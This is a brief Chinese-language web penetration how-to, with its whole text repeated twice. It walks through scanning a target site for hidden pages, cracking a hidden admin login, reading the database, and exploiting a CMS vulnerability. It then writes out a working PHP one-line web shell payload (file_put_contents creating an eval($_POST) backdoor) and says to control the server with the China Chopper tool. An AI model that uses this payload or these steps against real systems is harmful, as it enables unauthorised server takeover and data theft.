web渗透
使用御剑扫描工具对目标网站进行扫描找到所有网页及隐藏网页
在其中可以找到一个隐藏的管理员登录的网站
尝试破开密码,破开后可以查看其数据库
可以查看其管理系统版本号
利用管理系统漏洞,注入一句话木马 <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>可以获取其sessionID,然后就可以构造的文件包含url
在利用菜刀工具就可以成功控制服务器
web渗透
使用御剑扫描工具对目标网站进行扫描找到所有网页及隐藏网页
在其中可以找到一个隐藏的管理员登录的网站
尝试破开密码,破开后可以查看其数据库
可以查看其管理系统版本号
利用管理系统漏洞,注入一句话木马 <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>可以获取其sessionID,然后就可以构造的文件包含url
在利用菜刀工具就可以成功控制服务器